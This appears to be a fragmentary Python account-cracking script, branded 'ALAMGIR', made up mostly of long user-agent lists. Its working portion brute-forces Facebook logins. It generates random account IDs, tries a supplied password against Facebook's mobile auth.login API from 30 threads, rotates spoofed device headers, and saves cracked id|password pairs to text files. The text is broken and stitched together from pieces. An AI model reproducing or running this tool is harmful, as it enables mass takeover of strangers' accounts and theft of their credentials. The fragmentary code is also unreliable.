rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3",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i686) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.172 Safari/537.22",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Ubuntu; Linux i686; rv:63.0) Gecko/20100101 Firefox/63.0",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Chrome/54.0.2840.59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x86_64; rv:70.0) Gecko/20100101 Firefox/70.0",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HeadlessChrome/76.0.3809.87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HeadlessChrome/68.0.3419.0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Ubuntu; Linux x86_64; rv:87.0) Gecko/20100101 Firefox/87.0",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x86_64; rv:43.0) Gecko/20100101 Firefox/43.0",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Ubuntu Chromium/52.0.2743.116 Chrome/52.0.2743.116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Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1137.3",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Chrome/81.0.4044.122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Chrome/43.0.2357.134 Safari/537.36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http://notifyninja.com/monitoring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x86_64; rv:66.0) Gecko/20100101 Firefox/66.0",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Chrome/56.0.2924.76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x86_64; rv:45.0) Gecko/20100101 Thunderbird/45.8.0",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"WirtschaftsWoche-iOS-1.1.14-20200824.1315",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"[FBAN/FB4A;FBAV/222.0.0.48.113;FBBV/155323366;FBDM/{density=2.0,width=720,height=1360};FBLC/sr_RS;FBRV/156625696;FBCR/mt:s;FBMF/HUAWEI;FBBD/HUAWEI;FBPN/com.facebook.katana;FBDV/LDN-L21;FBSV/8.0.0;FBOP/19;FBCA/armeabi-v7a:armeabi;]",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WOW64; rv:60.0) Gecko/20100101 Thunderbird/60.7.0 Lightning/6.2.7",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; BRI/2)",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7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; McAfee; MAARJS)",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WOW64; Trident/7.0; MAARJS;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8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 2.0.4.16; MAAR)",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"Outlook-Express/7.0 (MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; eSobiSubscriber 1.0.0.40; BRI/2; MAAR; .NET CLR 1.1.4322; TmstmpExt)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; InfoPath.1; .NET4.0C; OfficeLiveConnector.1.5; OfficeLivePatch.1.3; .NET4.0E)",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"DoCoMo/2.0 P903i(c100;TB;W24H12)",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"DoCoMo/2.0 P903i",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"DoCoMo/2.0 SH10C(c500;TB;W16H12)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; MAFS; Microsoft Outlook 14.0.7162; ms-office; MSOffice 14)",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"HTC-3100/1.2 Mozilla/4.0 (compatible; MSIE 5.5; Windows CE; Smartphone; 240x320) UP.Link/6.3.0.0.0",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"HTC-3100/1.2 Mozilla/4.0 (compatible; MSIE 5.5; Windows CE; Smartphone; 240x320)",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"com.mobile.indiapp 2.0.5.5 phone HTC7088 android 16 fa zz normal long high 540 960",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"Mogujie4Android/NAMhuawei/1290",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10; AGR-AL09HN Build/HUAWEIAGR-AL09HN; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108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10; ANA-LX9 Build/HUAWEIANA-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Mobile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Android; 2.3.8; sv-se; Nexus 1 Build/HUAWEI_X3) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",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(Android; 4.0.4; Mobile; Huawei X3; rv:13.0) Gecko/13.0 Firefox/13.0",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(Android; Mobile Huawei X3; rv:13.0) Gecko/13.0 Firefox/13.0",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Android; 2.3.7; sv-se; Nexus 0 Build/HUAWEIX3) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Safari/533.1",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Android; 2.3.8; sv-se; Nexus 3 Build/HUAWEI_X3) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",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2.3.8; sv-se; Huawei X3 Build/HuaweiSocialPhone) AppleWebKit/534.15 (KHTML, like Gecko) CrMo/32.0.1005.22 Mobile Safari/534.15",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8.1.0; LG-H932BK Build/OPM6.171019.030.K1; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/69.0.3497.100 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/193.0.0.45.101;]",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"nokia-7.1-safari",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"NOKIA6120cUCBrowser/8.7.1.234/28/444/UCWEB",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4.1.2; en-au; GT-I8730T Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 [FB_IAB/FB4A;FBAV/61.0.0.15.69;]",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4.1.2; en-gb; GT-I8730T Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 [FB_IAB/FB4A;FBAV/79.0.0.18.71;]",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4.1.2; GT-I8730T Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 OPR/50.6.2426.201126",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4.4.2; GT-193011 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36 Mobile UCBrowser/3.4.3.532",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4.0.4; de-de; SonyEricssonMT11i Build/Xperia Ultimate HD™ 3.0.2) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",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(Android; Mobile; rv:30.0) Gecko/30.0 Firefox/30.0",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(Android; Tablet; rv:30.0) Gecko/30.0 Firefox/30.0",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6.2; rv:10.0) Gecko/20100101 Firefox/33.0",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6.2; Win64; x64; rv:10.0) Gecko/20100101 Firefox/33.0",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WOW64; rv:10.0) Gecko/20100101 Firefox/33.0",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10.6; rv:10.0) Gecko/20100101 Firefox/33.0",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PPC Mac OS X 10.6; rv:10.0) Gecko/20100101 Firefox/33.0",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i686; rv:10.0) Gecko/20100101 Firefox/33.0",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x86_64; rv:10.0) Gecko/20100101 Firefox/33.0",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i686 on x86_64; rv:10.0) Gecko/20100101 Firefox/33.0",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(Maemo; Linux armv7l; rv:10.0) Gecko/20100101 Firefox/10.0 Fennec/10.0",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(Mobile; rv:26.0) Gecko/26.0 Firefox/26.0",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(Tablet; rv:26.0) Gecko/26.0 Firefox/26.0",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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198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Chrome/88.0.4324.150 Safari/537.36 RuxitSynthetic/1.0 v9646582432 t38550 ath9b965f92 altpub cvcv=2",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10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84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; ) AppleWebKit/ (KHTML, like Gecko) Chrome/ Mobile Safari/",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4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile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5.1.1; Nexus 5 Build/LMY48B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.65 Mobile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Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0",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x.y; rv:42.0) Gecko/20100101 Firefox/42.0",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Phone 10.0; Android 6.0.1; Microsoft; RM-1152) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Mobile Safari/537.36 Edge/15.15254",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Phone 10.0; Android 4.2.1; Microsoft; RM-1127_16056) AppleWebKit/537.36(KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.10536",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Phone 10.0; Android 4.2.1; Microsoft; Lumia 950) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Mobile Safari/537.36 Edge/13.1058",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7.0; Pixel C Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98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6.0.1; SGP771 Build/32.2.A.0.253; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/52.0.2743.98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6.0.1; SHIELD Tablet K1 Build/MRA58K; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/55.0.2883.91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7.0; SM-T827R4 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.116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5.0.2; SAMSUNG SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102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Chrome/42.0.2311.135 Safari/537.36 Edge/12.246",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CrOS x86_64 8172.45.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.64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10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9",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6.0.1; Nexus Player Build/MMB29T)",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7.1.2; AFTMM Build/NS6264) CTV",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9; SM-N950U Build/PPR1.180610.011)",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"Dalvik/1.6.0 (Linux; U; Android 4.4.4; WT19M-FI Build/KTU84Q)",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9; SM-N960U Build/PPR1.180610.011)",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9; SM-G955U Build/PPR1.180610.011)",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10; SM-G965U Build/QP1A.190711.020)",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10; SM-G965U Build/QP1A.190711.020)",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10; SM-N960U Build/QP1A.190711.020)",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10; SM-G975U Build/QP1A.190711.020)",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7.1.2; AFTBAMR311 Build/NS6264) CTV",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9; SM-A102U Build/PPR1.180610.011)",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8.0.0; SM-G935V Build/R16NW)",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4.4.4; sk-sk; SAMSUNG SM-G357FZ/G357FZXXU1AQJ1 Build/KTU84P) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",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4.4.2; pl-pl; SM-T310 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30",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4.2.2;pl-pl; Lenovo S5000-F/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.2.2 Mobile Safari/534.30",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4.4.2; en-us; SCH-I535 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30",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"WeRead/5.2.2 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.3.4 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.2.4 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.1.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.1.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; VOG-L29 Build/HUAWEIVOG-L29)",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"WeRead/5.2.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.2.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; CDY-NX9A Build/HUAWEICDY-N29)",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"WeRead/5.1.2 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 7.0; BTV-W09 Build/HUAWEIBEETHOVEN-W09)",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"WeRead/5.1.2 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.1.1 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/5.1.0 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.0.3 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; ELE-L29 Build/HUAWEIELE-L29)",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"WeRead/5.0.5 WRBrand/huawei Dalvik/2.1.0 (Linux; U; Android 10; LYA-AL10 Build/HUAWEILYA-AL10)",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"WeRead/4.2.3 WRBrand/HUAWEI Dalvik/2.1.0 (Linux; U; Android 6.0.1; HUAWEI RIO-AL00 Build/HuaweiRIO-AL00)",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"WeRead/4.1.5 WRBrand/Huawei Dalvik/2.1.0 (Linux; U; Android 7.0; EVA-L09 Build/HUAWEIEVA-L09)",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"WeRead/3.5.0 WRBrand/HUAWEI Dalvik/2.1.0 (Linux; U; Android 6.0; DIG-AL00 Build/HUAWEIDIG-AL00)",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"WeRead/4.1.1 WRBrand/Huawei Dalvik/2.1.0 (Linux; U; Android 7.0; EVA-L09 Build/HUAWEIEVA-L09)",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"WeRead/4.1.1 WRBrand/HUAWEI Dalvik/2.1.0 (Linux; U; Android 6.0.1; HUAWEI RIO-AL00 Build/HuaweiRIO-AL00)",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5.1)",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"Dalvik/1.6.0 (Linux; U; Android 4.0.4; GT-P7510 Build/IMM76D)"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5.1; AFTM Build/LMY47O)",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6.0.1; SM-J700F Build/MMB29K) [FBAN/Orca-Android;FBAV/181.0.0.12.78;FBPN/com.facebook.orca;FBLC/tr_TR;FBBV/122216364;FBCR/Turk Telekom;FBMF/samsung;FBBD/samsung;FBDV/SM-J700F;FBSV/6.0.1;FBCA/armeabi-v7a:armeabi;FBDM{density=3.0,width=720,height=1440}",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"Dalvik/1.6.0 (Linux; U; Android 4.4.2; ASUS_T00Q Build/KVT49L)UNTRUSTED/1.0C-1.1; Opera Mini/att/4.2",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"Dalvik/1.4.0 (Linux; U; Android 2.3.6; HUAWEI Y210-0100 Build/HuaweiY210-0100)",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"Dalvik/1.4.0 (Linux; U; Android 2.3.6; GT-S5570 Build/GINGERBREAD)",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4.2.2; en-us; Galaxy Nexus Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.3",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"Dalvik/1.6.0 (Linux; U; Android 4.2.2; Galaxy Nexus Build/JDQ39)",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(iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Mobile/14G60",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5.1; PRO 5 Build/LMY47D)",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Win32; WinHttp.WinHttpRequest.5)",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x64; rv:58.0) Gecko/20100101 Firefox/58.0",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Chrome/71.0.3578.98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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115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6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322)",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Chrome/89.0.4389.114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Chrome/47.0.2526.106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x64; rv:85.0) Gecko/20100101 Firefox/85.0",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132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IoT 10.0; Android 6.0.1; WebView/3.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Mobile Safari/537.36 Edge/17.17134",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Chrome/81.0.4044.113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x64; rv:79.0) Gecko/20100101 Firefox/79.0",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"Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]"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sys.stdout.write(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"\r [ Alamgir ] %s/%s -&gt; Ok:-%s - Cp:-%s "%(self.loop, len(self.id), len(self.cp), len(self.ok))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); sys.stdout.flush()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pw in pwx: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pw = pw.lower()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ses = requests.Session()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headers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"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)),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"x-fb-sim-hni": str(random.randint(20000, 40000)),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"x-fb-net-hni": str(random.randint(20000, 40000)),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"x-fb-connection-quality": "EXCELLENT",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"x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA",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"user-agent": rua,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"content-type": "application/x-www-form-urlencoded",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"x-fb-http-engine": "Liger"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response = ses.get("https://b-api.facebook.com/method/auth.login?format=json&amp;email="+str(uid)+"&amp;password="+str(pw)+"&amp;credentials_type=device_based_login_password&amp;generate_session_cookies=1&amp;error_detail_type=button_with_disabled&amp;source=device_based_login&amp;meta_inf_fbmeta=%20&amp;currently_logged_in_userid=0&amp;method=GET&amp;locale=en_US&amp;client_country_code=US&amp;fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&amp;access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&amp;fb_api_req_friendly_name=authenticate&amp;cpl=true", headers=headers)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"session_key" in response.text and "EAAA" in response.text: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print("\r \033[0;92m[ ALAMGIR-OK ] %s | %s\033[0;97m         "%(uid, pw))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 ("\r \033[0;92m Congrats Bro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self.ok.append("%s|%s"%(uid, pw))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open("2009-ALAMGIR-Ok.txt","a").write(" %s|%s\n"%(uid, pw))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elif "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www.facebook.com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in response.json()["error_msg"]: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print("\r \033[0;92m[ ALAMGIR-OK ] %s | %s\033[0;97m         "%(uid, pw))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self.cp.append("%s|%s"%(uid, pw))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open("2009-ALAMGIR-OK.txt","a").write(" %s | %s\n"%(uid, pw))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self.loop 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old2(self):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x = 1111111111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xx = 9999999999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idx = "10000"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os.system('clear');print(logo)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limit = int(input("\n \033[0;95m[+]\033[0;93m TOTAL IDS TO CRACK LIMIT 80,000: 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 n in range(limit):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_ = random.randint(x,xx)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__ = idx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self.id.append(__+str(_))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print("\033[0;93m [+] TOTAL ID -&gt; \033[0;91m%s\033[0;97m"%(len(self.id)))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with ThreadPoolExecutor(max_workers=30) as coeg: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print("\n\033[1;32m [!] USE (123456) FOR IDZ\033[1;37m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listpass = input("%s [?] ENTER PASSWORD :%s "%(G,Y))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len(listpass)&lt;=5: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exit("\n%s [!] PASSWORD MINIMUM 6 CHARACTERS"%(B))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print("%s [*] CRACK WITH PASSWORD -&gt; [\033[0;91m%s\033[0;93m]"%(G,listpass))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os.system("clear")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print(logo)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print("\n%s [+] OK RESULTS SAVED IN -&gt; ok.txt"%(Y))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print("%s [+] CP RESULTS SAVED IN -&gt; cp.txt"%(G))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print("%s [!] IF NO RESULT USE AIRPLANE MODE 5 SECONDS\x1b[0m\n"%(P))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for user in self.id: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coeg.submit(self.api, user, listpass.split(","))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exit("\n\n [&gt;&gt;] CRACK COMPLETE...")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except Exception as e:exit(str(e))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def api(self, uid, pwx):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rua = random.choice([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"Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z007;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]",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"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",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7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; .NET4.0E; GWX:QUALIFIED)",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Win64; x64; rv:40.0) Gecko/20100101 Firefox/40.0.2 Waterfox/40.0.2",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5.0; SAMSUNG SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile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4.4.2; SM-T217S Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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WOW64; Trident/7.0; MALNJS;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4.4.2; RCT6203W46 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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8.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",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(Android; Tablet; rv:34.0) Gecko/34.0 Firefox/34.0",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(compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; Touch)",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(compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/7.0; TNJB; 1ButtonTaskbar)",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(compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",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4.0.4; BNTV400 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111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4.0.4; BNTV600 Build/IMM76L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111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4.4.2; SM-T237P Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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4.4.2; SM-T530NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84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5.0.1; SCH-I545 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile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5.0; SAMSUNG SM-N900T Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile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5.1.1; SAMSUNG SM-G920P Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Mobile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5.1.1; SAMSUNG SM-G920T Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.2 Chrome/38.0.2125.102 Mobile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5.1.1; SAMSUNG SM-N910P Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile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4.4.2; en-us; LG-V410/V41010d Build/KOT49I.V41010d) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.1599.103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4.4.3; en-us; KFARWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93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4.4.3; en-us; KFSAWI Build/KTU84M) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93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10.9; rv:34.0) Gecko/20100101 Firefox/34.0",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10.9; rv:36.0) Gecko/20100101 Firefox/36.0",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10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155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10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130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10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157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10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130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10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85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10_10_3) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/8.0.6 Safari/600.6.3",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10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.107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10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174",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10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2503.0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10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko)",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10_10_5) AppleWebKit/601.1.56 (KHTML, like Gecko) Version/9.0 Safari/601.1.56",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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81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10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157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10_9_5) AppleWebKit/600.6.3 (KHTML, like Gecko) Version/7.1.6 Safari/537.85.15",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x64; Trident/7.0;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WOW64; Trident/7.0; Touch; MAARJS;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WOW64; Trident/7.0; Touch; MALNJS;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WOW64; Trident/7.0; Touch; MDDCJS;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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36 LBBROWSER",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5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155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6.0; rv:38.0) Gecko/20100101 Firefox/38.0",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6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US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6.0; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0",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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90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6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65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rv:28.0) Gecko/20100101 Firefox/28.0",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rv:31.0) Gecko/20100101 Firefox/31.0",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rv:36.0) Gecko/20100101 Firefox/36.0",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Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.13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Chrome/30.0.1599.101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Chrome/33.0.1750.146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Chrome/36.0.1985.125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Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US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Chrome/38.0.2125.101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Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0",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Chrome/39.0.2171.71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Chrome/39.0.2171.99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Chrome/41.0.2272.118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Chrome/42.0.2311.154 Safari/537.36 LBBROWSER",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Chrome/43.0.2357.132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Maxthon/4.4.6.1000 Chrome/30.0.1599.101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WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",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WOW64; rv:34.0) Gecko/20100101 Firefox/34.0",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WOW64; Trident/7.0; ASJB; ASJB; MAAU;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WOW64; Trident/7.0; BOIE9;ENUSSEM;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WOW64; Trident/7.0; MDDRJS;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6.2; Win64; x64; Trident/7.0;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6.2; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0",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6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0",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Trident/7.0; Touch; TNJB;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Win64; x64; Trident/7.0; MALNJS;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Win64; x64; Trident/7.0; Touch; MAARJS;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Win64; x64; Trident/7.0; Touch; MASMJS;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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.104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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130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WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.6.2000 Chrome/30.0.1599.101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WOW64; Trident/7.0; Touch; MAARJS;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WOW64; Trident/7.0; Touch;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(Windows; U; Windows NT 6.1; zh-CN; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (.NET CLR 3.5.30729)",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CrOS x86_64 6457.107.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115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CrOS x86_64 7077.95.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.90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Fedora; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0",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i686; rv:40.0) Gecko/20100101 Firefox/40.0",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AppleWebKit/534.24 (KHTML, like Gecko) Chrome/33.0.0.0 Safari/534.24",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Chrome/34.0.1847.76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Chrome/38.0.2125.102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Chrome/43.0.2357.134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Ubuntu Chromium/37.0.2062.94 Chrome/37.0.2062.94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10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2",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U; Intel Mac OS X 10_6_6; en-en) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4",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10_10_5) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.8",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10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10",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10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/E7FBAF",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10_10; rv:33.0) Gecko/20100101 Firefox/33.0",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10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko)",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"Mac OS X/10.6.8 (10K549); ExchangeWebServices/1.3 (61); Mail/4.6 (1085)",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10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7",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U; Intel Mac OS X 10_5_4; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1",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10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko)",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10_9_5) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/537.86.7",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"MacOutlook/0.0.0.150815 (Intel Mac OS X Version 10.10.5 (Build 14F27))",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10.9; rv:28.0) Gecko/20100101 Firefox/28.0",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10.10; rv:34.0) Gecko/20100101 Firefox/34.0",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10.7; rv:46.0) Gecko/20100101 Firefox/46.0",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10.9; rv:44.0) Gecko/20100101 Firefox/44.0",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10.10; rv:51.0) Gecko/20100101 Firefox/51.0",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U; Intel Mac OS X 10.4; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5",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10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124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10.10; rv:52.0) Gecko/20100101 Firefox/52.0",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10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153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10.8; rv:38.0) Gecko/20100101 Firefox/38.0",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10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130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CK={} (Windows NT 6.1; WOW64; Trident/7.0;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Chrome/74.0.3729.169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WOW64) 